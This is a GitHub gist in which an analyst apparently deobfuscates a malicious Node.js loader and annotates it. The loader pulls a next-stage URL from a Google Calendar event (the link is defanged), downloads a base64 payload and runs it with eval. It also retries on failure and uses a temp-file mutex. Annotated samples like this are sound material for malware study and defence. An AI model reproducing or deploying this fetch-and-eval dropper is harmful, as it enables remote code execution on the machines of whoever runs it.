Last active
February 4, 2025 14:23
-
-
Save ghoulgy/2c509b18518c0f12003c495f8d8219c6 to your computer and use it in GitHub Desktop.
Base64 decoded javascript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict'; | |
| var https = require('https'), fs = require('fs'), | |
| tcbbhlssm = (e, t) => e.match(new RegExp(`${t}=("([^"]*)")`))[1], | |
| vbsxc = async (e, t) => { | |
| try { | |
| const s = await fetch(e); | |
| if (s.ok) { | |
| if (200 !== s.status) { | |
| const e = s.headers.get("location"); | |
| return vbsxc(e, t); | |
| } | |
| const e = await s.text(); | |
| t(null, tcbbhlssm(e, "data-base-title")); | |
| } else { | |
| t(new Error('')); | |
| } | |
| } catch (e) { | |
| console.log(e), t(e); | |
| } | |
| }, | |
| iktunpylv = async (e, t) => { | |
| try { | |
| const s = await fetch(e); | |
| if (s.ok) { | |
| const e = await s.text(), c = s.headers; | |
| t(null, { | |
| gxawtnme: e, | |
| tnnxfqk: c.get("ivbase64"), | |
| secretKey: c.get("secretkey") | |
| }); | |
| } else { | |
| t(new Error('')); | |
| } | |
| } catch (e) { | |
| t(e); | |
| } | |
| }, | |
| // Function t is Callback function | |
| // If it enters function vbsxc then the callback function will be async (bqcxlxixkq, link) ... | |
| // If it enters function iktunpylv then the callback function will be async (bqcxlxixkq, { gxawtnme, tnnxfqk, secretKey }) ... | |
| gdwsvicxv = async () => { | |
| await vbsxc("https://calendar.app[.]google/a1vRBeuKn6NmKZC7", async (bqcxlxixkq, link) => { // The Google calender contains a base64 strings which leads to next stage payload URL | |
| bqcxlxixkq ? ( | |
| console.log('bqcxlxixkq'), | |
| await new Promise(e => setTimeout(e, 1000)), | |
| gdwsvicxv() | |
| ) : | |
| await iktunpylv(link, async (bqcxlxixkq, { gxawtnme, tnnxfqk, secretKey }) => { | |
| if (bqcxlxixkq) { | |
| console.log('bqcxlxixkq'), | |
| await new Promise(e => setTimeout(e, 1000)), | |
| gdwsvicxv(); | |
| } else { | |
| if (20 == gxawtnme.length) // atob(cHJvY2Vzcy5leGl0KDAp) == process.exit(0) | |
| return void eval(atob(gxawtnme)); | |
| const _iv = Buffer.from(tnnxfqk, 'base64'); // If the content length is not 20, then it is possible that variable tnnxfqk contains base64 encoded payload | |
| eval(atob(gxawtnme)); // Execute base64 decoded payload | |
| } | |
| }); | |
| }); | |
| }, | |
| ryrpzhjec = process.env.TEMP + '\\ikztsx'; | |
| fs.existsSync(ryrpzhjec) && process.exit(1); | |
| fs.writeFileSync(ryrpzhjec, ''); | |
| process.on('exit', () => { | |
| fs.unlinkSync(ryrpzhjec); | |
| }); | |
| gdwsvicxv(); | |
| var xfqwh = 0; | |
| process.on('uncaughtException', async e => { | |
| console.log(e); | |
| fs.writeFileSync('_logs_bqcxlxixkq_uncaughtException.txt', e); | |
| ++xfqwh > 10 && process.exit(0); | |
| await new Promise(e => setTimeout(e, 1000)); | |
| gdwsvicxv(); | |
| }); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment